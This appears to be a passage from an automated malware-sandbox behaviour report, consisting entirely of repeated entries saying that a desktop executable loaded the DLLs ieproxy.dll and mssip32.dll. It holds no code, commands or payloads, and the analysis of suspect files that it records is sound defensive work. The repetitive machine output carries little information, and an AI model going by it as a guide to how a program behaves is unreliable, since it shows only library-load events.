            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\JDQS879kiy.exeSection loaded: mssip32.dllJump to behavior
